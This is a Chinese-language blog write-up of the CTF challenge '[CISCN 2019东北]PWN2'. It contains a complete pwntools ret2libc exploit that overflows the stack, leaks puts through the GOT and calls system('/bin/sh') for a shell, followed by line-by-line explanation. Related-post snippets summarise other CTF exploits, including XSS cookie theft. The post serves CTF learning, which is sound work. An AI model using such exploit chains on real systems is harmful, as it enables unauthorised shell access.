[CISCN 2019东北]PWN2

最新推荐文章于 2024-06-17 17:35:06 发布
最新推荐文章于 2024-06-17 17:35:06 发布
阅读量291 收藏 1
点赞数 9
分类专栏: PWN 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76466003/article/details/134517267
版权

retlibc

没有system和binshell地址的retlibc

encrypt函数是关键,存在栈溢出

exp

from pwn import *
from LibcSearcher import *
p = remote('node5.anna.nssctf.cn',28831)
pop_rdi = 0x400c83
ret =0x4006b9
elf = ELF('./pwn2')
encrypt = elf.sym['encrypt']
puts_plt =elf.plt['puts']
puts_got = elf.got['puts']
payload1 = b'a'*(0x50+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(encrypt)
p.sendlineafter("choice!",str(1))
p.sendlineafter("encrypted",payload1)
put = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(put))
libc = LibcSearcher('puts',put)
libc_base= put - libc.dump('puts')
bin_sh = libc_base+libc.dump('str_bin_sh')
system_add = libc_base +libc.dump('system')
payload2 = b'a'*0x58+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system_add)
p.sendlineafter("encrypted",payload2)
p.interactive()

pop_rdi和ret的地址用命令

ROPgadget --binary  pwn2 --only "pop|ret"

关于payload1

payload1 = b'a'*(0x50+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(encrypt)

b'a'*(0x50+8) :是用来造成栈溢出,

p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+:输出puts函数的真实地址,用于后面的寻找libc

p64(encrypt):返回encrypt函数的地址,再次执行函数

关于payload2

payload2 = b'a'*0x58+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system_add)

栈溢出

payload2=p64(ret)   

ret 指令用来从子程序中返回到主程序中,通常配合 call 指令一起使用。在执行 call 指令时,会将当前指令的地址压入栈中,之后执行子程序的代码,执行完毕后再通过 ret 指令跳回到原来的位置。          

p64(pop_ret_rdi_addr)+p64(bin_sh_addr):system函数的参数准备,即把'/bin/sh'的地址传入

p64(system_real_addr)    调用system

关于LibcSearcher

libc=LibcSearcher('puts',puts_real_addr)        

#LibcSearcher,通过函数名和函数真实地址来找到对应的libc(之后会做选择,选择正确的那个即可)

libc_base= put - libc.dump('puts') 

#libc的真实的基址=puts的真实地址-puts相对于libc基址的偏移量

bin_sh = libc_base+libc.dump('str_bin_sh')

#'/bin/sh'的真实地址=libc基址的真实地址+'/bin/sh'相对于libc基址的偏移量

system_add = libc_base +libc.dump('system')

#system函数的真实地址=libc基址的真实地址+system函数相对于libc基址的偏移量

沈理大学牲
关注
  • 9
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
[CISCN 2019东北]PWN2题解
XJQ100717的博客
04-20 799
要学习的看过来
【PWN · ret2libc】[CISCN 2019东北]PWN2
Mr_Fmnwon的博客
06-02 641
持续巩固ret2libc的做题范式/基本套路能力,同时也发现,reverse与pwn密不可分的联系。【PWN · ret2libc】[2021 鹤城杯]babyof_Mr_Fmnwon的博客-CSDN博客这篇博客ret2libc的细节比较多,且这两个题目完全相似。
[BUUCTF]PWN——ciscn_2019_final_2
mcmuyanga的博客
03-10 1079
ciscn_2019_final_2 附件 步骤 例行检查,64位程序,保护全开 本地没有flag文件,远程连接一下,经典的堆题的菜单 64位ida载入 init() allocate(),只可以申请0x20或者0x10的chunk delete() show(),show只能调用3次 bye_bye 这道题的关键点在于文件流的知识 dup2 用来复制文件描述符:int dup2 (int oldfd,int newfd) _fileno 是用来规定 fd 所指向的文件流的,i
BUUCTF-[CISCN2019东北赛区]Web2
AndyNoel的博客
05-13 383
BUUCTF-[CISCN2019东北赛区]Web2 看题 一个论坛,内容不错:) 可以投稿,点击投稿发现要注册,那就先注册登录。随便账号密码就行。 常规操作,扫一下站点,发现有admin.php,进行访问 思路 有session,可以确定一个思路,获取管理员的session得到权限,然后拿到flag 执行 去投稿,发现存在XSS漏洞,但是有一些过滤,''(''被转义成了"(",存在WAF,先转码,然后eval执行JS代码,并且需要一个window.location.href来自动触发刷新页面 使用
[CISCN2019东北赛区]Web2
qq_42551635的博客
05-13 415
[CISCN2019东北赛区]Web2 前言 特别好的一道题,做完神清气爽,学到好多东西 知识点 xss 攻击获取cookie buu攻击平台 利用 cookie 获取管理员权限 获取到管理员cookie后,利用控制台中的application模块,修改页面cookie md5验证码哈希 import hashlib def func(md5_val): for x in range(999999, 100000000): md5_value=hashlib.md5(str(x
BUUCTF:[CISCN2019东北赛区]Web2
末初的CSDN博客
03-31 2603
BUUCTF:[CISCN2019东北赛区]Web2 参考:https://blog.csdn.net/weixin_44677409/article/details/100741998 经测试发现存在以下页面: index.php admin.php login.php register.php post.php commitbug.php about.php admin.php没有权限...
PWN刷题记录(1)--ciscn_2019_n_5
小心信科理化声
05-10 291
这是第一篇的刷题记录,从ret2text开始刷起 0x1 程序分析 先checksec 一下 64位的小端序,NX没开启,妥妥的写shellcode 拖入IDA中查看一下 main函数如下 可以看到gets(text)有明显的溢出 然后还可以看到关键的read函数,可以做libc泄露用,先留着 然后查找一下有没有能用到的system函数和binsh 无system函数 估计也没有binsh了 咋办呢>? 看一下有没有可读可写可执行的字段呢? 看看这里的两个变量:name\text 存在!
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
GLM+vLLM 部署调用
qq_38915354的博客
06-13 1156
vLLM 框架是一个高效的大型语言模型(LLM)推理和部署服务系统
找出Python潜在的编程问题
svygh123的专栏
06-13 1066
Pylint 是一个非常强大的静态代码分析工具,主要用于检查 Python 代码的语法错误、代码风格问题以及潜在的编程错误。它是 Open Source Initiative 认证的开源软件,由 Logilab 团队开发维护。
第9章 类
最新发布
我走的每一步都算数
06-17 721
让一个类继承另一个类后,就可以添加区分子类和父类所需的新属性和新方法了。class Car:class ElectricCar(Car): # 继承Carself.battery = 85 # 新属性mycar = ElectricCar(2024, 'Au', 'A7') # 创建实例mycar.prt_battery() # 新方法熟悉Python 提供的选项,这样才能确定哪种组织方式是最佳的,并能理解别人开发的项目。
python迁移数据教程
2402_85292291的博客
06-13 699
if os.path.isfile(src_item_path): dest_item_path = os.path.join(dest_folder, item) shutil.copy2(src_item_path, dest_item_path) # 如果item是目录,递归调用migrate_data函数。2. 准备源文件夹和目标文件夹: 在您的计算机上创建两个文件夹,分别为源文件夹(source_folder)和目标文件夹(destination_folder)。将您希望迁移的数据放入源文件夹。
Python | Leetcode Python题解之第149题直线上最多的点数
Mopes__的博客
06-14 515
Python | Leetcode Python题解之第149题直线上最多的点数
ctfshow的pwn2
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag文件。 2. 使用cat命令打开flag文件,成功拿到flag。 3. 接下来,构造exp,引用中给出了一个使用pwntools库构造的exp示例。其中,使用remote函数连接到pwn.challenge.ctf.show的28025端口。 4. 设置bk变量的值为0x804850f。 5. 构造payload,其中包含了"a"*(0x9 0x4)和p32(bk)。 6. 使用sendline函数发送payload。 7. 使用interactive函数与远程主机进行交互。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值